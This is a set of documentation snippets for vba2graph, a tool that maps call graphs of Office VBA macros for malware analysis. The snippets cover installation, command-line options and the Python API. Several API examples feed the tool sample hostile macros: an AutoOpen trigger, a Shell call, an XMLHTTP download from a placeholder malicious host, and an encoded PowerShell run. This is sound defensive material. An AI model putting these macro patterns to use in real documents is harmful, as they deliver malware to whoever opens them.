### Install Graphviz on Ubuntu Source: https://github.com/malwarecantfly/vba2graph/blob/master/README.md Install Graphviz using apt-get. ```bash sudo apt-get install graphviz ``` -------------------------------- ### Install vba2graph Dependencies Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Provides commands to install the necessary Python packages and system dependencies for vba2graph. Includes installation for 'oletools', 'networkx', 'regex', 'graphviz', and 'pydot'. Also shows how to install Graphviz on different operating systems. ```bash # 1. Install oletools for VBA extraction pip3 install oletools # 2. Install Python dependencies pip3 install networkx>=2.1 regex graphviz>=0.8.4 pydot>=1.2.4 # Or using requirements.txt: pip3 install -r requirements.txt # 3. Install Graphviz system package # Ubuntu/Debian: sudo apt-get install graphviz # macOS: brew install graphviz # Arch Linux: sudo pacman -S graphviz # Windows - download from https://graphviz.gitlab.io/download/#windows # Then add dot.exe to PATH: set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin ``` -------------------------------- ### Install Graphviz on Arch Linux Source: https://github.com/malwarecantfly/vba2graph/blob/master/README.md Install Graphviz using pacman. ```bash sudo pacman -S graphviz ``` -------------------------------- ### Install Python Requirements Source: https://github.com/malwarecantfly/vba2graph/blob/master/README.md Install the necessary Python dependencies for the project. ```bash pip3 install -r requirements.txt ``` -------------------------------- ### Install Graphviz on macOS Source: https://github.com/malwarecantfly/vba2graph/blob/master/README.md Install Graphviz using Homebrew. ```bash brew install graphviz ``` -------------------------------- ### Vba2Graph Usage Examples Source: https://github.com/malwarecantfly/vba2graph/blob/master/README.md Common command line patterns for generating call graphs from Office files or VBA code. ```bash # Generate call graph directly from an Office file with macros [tnx @doomedraven] python3 vba2graph.py -f malicious.doc -c 2 # Generate vba code using olevba then pipe it to vba2graph olevba3 malicious.doc | python3 vba2graph.py -c 1 # Generate call graph from VBA code python3 vba2graph.py -i vba_code.bas -o output_folder ``` -------------------------------- ### Select Color Scheme 1 (Cyan/Dark Theme) Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Analyze a sample Office document using color scheme 1, which provides a darker background with cyan accents for a distinct visual style. ```bash python3 vba2graph.py -f sample.doc -c 1 ``` -------------------------------- ### Analyze Office File with Default Theme and Custom Output Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Analyze an Office file using the default black & white theme and specify a custom output directory for the analysis results. ```bash python3 vba2graph.py -f suspicious_spreadsheet.xlsm -o ./analysis_results ``` -------------------------------- ### Vba2Graph Command Line Help Source: https://github.com/malwarecantfly/vba2graph/blob/master/README.md Display the help menu for the vba2graph script. ```bash usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE) optional arguments: -h, --help show this help message and exit -o OUTPUT, --output OUTPUT output folder (default: "output") -c {0,1,2,3}, --colors {0,1,2,3} color scheme number [0, 1, 2, 3] (default: 0 - B&W) -i INPUT, --input INPUT olevba generated file or .bas file -f FILE, --file FILE Office file with macros ``` -------------------------------- ### Select Color Scheme 0 (Black & White) Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Analyze a sample Office document using color scheme 0, which is the default black & white theme suitable for professional use and printing. ```bash python3 vba2graph.py -f sample.doc -c 0 ``` -------------------------------- ### Select Color Scheme 2 (80s Theme) Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Analyze a sample Office document using color scheme 2, featuring vibrant pink and blue colors reminiscent of an 80s aesthetic. ```bash python3 vba2graph.py -f sample.doc -c 2 ``` -------------------------------- ### Select Color Scheme 3 (Terminal Theme) Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Analyze a sample Office document using color scheme 3, which mimics a classic terminal look with green text on a black background. ```bash python3 vba2graph.py -f sample.doc -c 3 ``` -------------------------------- ### Vba2Graph Full Help Output Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Display the full help message for the vba2graph.py command, showing all available options and their descriptions. ```bash python3 vba2graph.py -h ``` -------------------------------- ### Configure Graphviz Path on Windows Source: https://github.com/malwarecantfly/vba2graph/blob/master/README.md Set the PATH environment variable to include the Graphviz bin directory. ```batch set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin ``` -------------------------------- ### Analyze Office File Directly (80s Theme) Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Use this command to analyze an Office file directly. The -c 2 flag selects the 80s color scheme. ```bash python3 vba2graph.py -f malicious.doc -c 2 ``` -------------------------------- ### Pipe Olevba Output to Vba2Graph (Cyan Theme) Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Pipe the output of `olevba3` directly to vba2graph for analysis. The -c 1 flag selects the cyan color theme. ```bash olevba3 malicious.doc | python3 vba2graph.py -c 1 ``` -------------------------------- ### Process Pre-extracted VBA Code (.bas file) Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Use this command to process a pre-extracted VBA code file in .bas format and specify an output folder. ```bash python3 vba2graph.py -i extracted_macros.bas -o output_folder ``` -------------------------------- ### Extract VBA Code from OLE File Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Demonstrates parsing OLE file output to extract only the VBA code using the handle_olevba_input function. ```python olevba_output = """olevba 0.55.1 - http://decalage.info/python/oletools FILE: malicious.doc Type: OLE ------------------------------------------------------------------------------- VBA MACRO ThisDocument.cls - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub AutoOpen() MsgBox "Document opened" Call RunMalware End Sub ------------------------------------------------------------------------------- VBA MACRO Module1.bas - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub RunMalware() Shell "cmd.exe /c calc.exe" End Sub ------------------------------------------------------------------------------- """ # Parse and extract only VBA code vba_code = handle_olevba_input(olevba_output) print(vba_code) ``` -------------------------------- ### handle_olevba_input() Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Parses olevba output format and extracts only the VBA code portions. ```APIDOC ## handle_olevba_input() ### Description Parses olevba output format and extracts only the VBA code portions, filtering out metadata and formatting. ``` -------------------------------- ### create_call_graph() Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Creates a NetworkX directed graph representing function call relationships from a dictionary of extracted VBA functions. ```APIDOC ## create_call_graph(func_dict) ### Description Processes a dictionary of extracted VBA functions to build a directed graph where nodes are functions and edges represent function calls. ### Parameters - **func_dict** (dict) - Required - A dictionary where keys are function names and values are the function body content. ### Response - **DG** (networkx.DiGraph) - A directed graph object representing the call structure. ``` -------------------------------- ### Generate Graph from Pre-processed VBA Content (80s Theme) Source: https://context7.com/malwarecantfly/vba2graph/llms.txt This Python code demonstrates how to generate a call graph from pre-processed VBA content using `vba2graph_gen`. It specifies the 80s color scheme and details the output file structure, including PNG, SVG, DOT, and BAS files. ```python from vba2graph import vba2graph_gen, color_schemes # Pre-processed VBA content (e.g., from olevba or manual extraction) vba_content = """ Sub AutoOpen() Call DownloadPayload End Sub Sub DownloadPayload() Dim http As Object Set http = CreateObject("MSXML2.XMLHTTP") http.Open "GET", "http://malicious.example.com/payload", False http.Send End Sub """ # Generate graph with 80s color scheme vba2graph_gen( input_vba_content=vba_content, output_folder="./output", input_file_name="sample_macro", color_scheme=color_schemes[2] # 80s theme ) # Output structure created: # ./output/ # ├── png/sample_macro.png # Visual graph image # ├── svg/sample_macro.svg # Vector graphics version # ├── dot/sample_macro.dot # Graphviz DOT file # └── bas/sample_macro.bas # Extracted VBA functions listing ``` -------------------------------- ### Create VBA Function Call Graph Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Processes VBA content through a pipeline of cleaning and extraction functions to create a NetworkX directed graph representing function call relationships. Requires importing several vba2graph functions. ```python from vba2graph import ( vba_seperate_lines, vba_clean_whitespace, vba_clean_metadata, vba_deobfuscation, vba_extract_functions, create_call_graph ) vba_content = """ Sub AutoOpen() Call InitializeConnection Call DownloadFile End Sub Sub InitializeConnection() Set objHTTP = CreateObject("MSXML2.XMLHTTP") End Sub Sub DownloadFile() Call InitializeConnection objHTTP.Open "GET", url, False End Sub """ # Process VBA content through pipeline lines = vba_seperate_lines(vba_content) lines = vba_clean_whitespace(lines) lines = vba_clean_metadata(lines) lines = vba_deobfuscation(lines) func_dict = vba_extract_functions(lines) # Create directed graph DG = create_call_graph(func_dict) # Examine graph structure print("Nodes:", list(DG.nodes())) # Output: ['AutoOpen', 'InitializeConnection', 'DownloadFile'] print("Edges:", list(DG.edges(data=True))) # Output: [('AutoOpen', 'InitializeConnection', {'count': 1}), # ('AutoOpen', 'DownloadFile', {'count': 1}), # ('DownloadFile', 'InitializeConnection', {'count': 1})] ``` -------------------------------- ### Find and Highlight Malicious Keywords in VBA Graph Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Scans VBA code for suspicious keywords and highlights them in the generated call graph. This function helps detect malicious API calls, obfuscation techniques, and auto-execution triggers. Requires the call graph and function dictionary as input. ```python from vba2graph import ( vba_seperate_lines, vba_clean_whitespace, vba_clean_metadata, vba_deobfuscation, vba_extract_functions, create_call_graph, find_keywords_in_graph, color_schemes ) vba_content = """ Sub AutoOpen() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "powershell -enc BASE64STRING" End Sub """ # Process and create graph lines = vba_seperate_lines(vba_content) lines = vba_clean_whitespace(lines) lines = vba_clean_metadata(lines) lines = vba_deobfuscation(lines) func_dict = vba_extract_functions(lines) DG = create_call_graph(func_dict) # Find and highlight malicious keywords DG = find_keywords_in_graph(func_dict, DG) # Check detected keywords for AutoOpen function print("Detected keywords:", DG.nodes["AutoOpen"]["keywords"]) # Keywords detected: CreateObject, WScript.Shell, Run, PowerShell # AutoOpen will also be highlighted as an autorun trigger function ``` -------------------------------- ### Batch Processing Script for VBA Analysis Source: https://context7.com/malwarecantfly/vba2graph/llms.txt A bash script to automate the processing of multiple Office documents. It uses 'olevba3' to extract macros and 'vba2graph.py' to generate call graphs for each extracted macro file. Ensure 'input' directory contains documents and 'output' directory will store results. ```bash #!/bin/bash # batch.sh - Process multiple Office files # Clean previous output rm -rf olevba_output rm -rf output mkdir olevba_output # Extract macros from all files in input directory for file in input/*; do echo "Processing: $file" olevba3 -c "$file" > "olevba_output/$(basename $file).bas" done # Generate graphs for all extracted macros for file in olevba_output/*; do python3 vba2graph.py -i "$file" -o "output" done echo "Batch processing complete. Results in ./output/" ``` -------------------------------- ### Parse Olevba Output Source: https://context7.com/malwarecantfly/vba2graph/llms.txt This Python function `handle_olevba_input` is designed to parse output from the `olevba` tool, specifically extracting only the VBA code sections while filtering out extraneous metadata and formatting. ```python from vba2graph import handle_olevba_input ``` -------------------------------- ### find_keywords_in_graph() Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Scans VBA code for suspicious keywords and highlights them within the generated call graph. ```APIDOC ## find_keywords_in_graph(func_dict, DG) ### Description Analyzes the VBA function dictionary for malicious API calls, obfuscation techniques, and auto-execution triggers, updating the graph nodes with detected keyword metadata. ### Parameters - **func_dict** (dict) - Required - The dictionary of extracted VBA functions. - **DG** (networkx.DiGraph) - Required - The existing call graph to be annotated. ### Response - **DG** (networkx.DiGraph) - The updated graph with 'keywords' attribute added to relevant nodes. ``` -------------------------------- ### Extract and Generate Graph from Office File Source: https://context7.com/malwarecantfly/vba2graph/llms.txt This Python code extracts VBA macros from an Office file using `vba2graph_from_vba_object` and then generates a call graph with the terminal color scheme using `vba2graph_gen`. It includes error handling for cases where no macros are found. ```python from vba2graph import vba2graph_from_vba_object, vba2graph_gen, color_schemes # Extract macros from Office file filepath = "suspicious_document.docm" vba_content = vba2graph_from_vba_object(filepath) if vba_content: # Generate graph with terminal color scheme vba2graph_gen( input_vba_content=vba_content, output_folder="analysis_output", input_file_name="suspicious_document", color_scheme=color_schemes[3] # Terminal theme ) print("Graph generated successfully!") else: print("No macros found or extraction failed") ``` -------------------------------- ### vba2graph_from_vba_object() Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Extracts and processes VBA macros directly from an Office file using oletools' VBA_Parser. ```APIDOC ## vba2graph_from_vba_object() ### Description Extracts and processes VBA macros directly from an Office file using oletools' VBA_Parser. Returns the processed VBA content ready for graph generation. ### Parameters - **filepath** (string) - Required - The path to the Office document containing macros. ### Response - **vba_content** (string) - The extracted and processed VBA macro code. ``` -------------------------------- ### vba2graph_gen() Source: https://context7.com/malwarecantfly/vba2graph/llms.txt Core function that generates the call graph from processed VBA content. ```APIDOC ## vba2graph_gen() ### Description Generates the call graph from processed VBA content and creates output in multiple formats: PNG, SVG, DOT, and BAS. ### Parameters - **input_vba_content** (string) - Required - The processed VBA macro code. - **output_folder** (string) - Required - The directory where output files will be saved. - **input_file_name** (string) - Required - The base name for the generated output files. - **color_scheme** (object) - Required - The color scheme object to use for visualization. ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.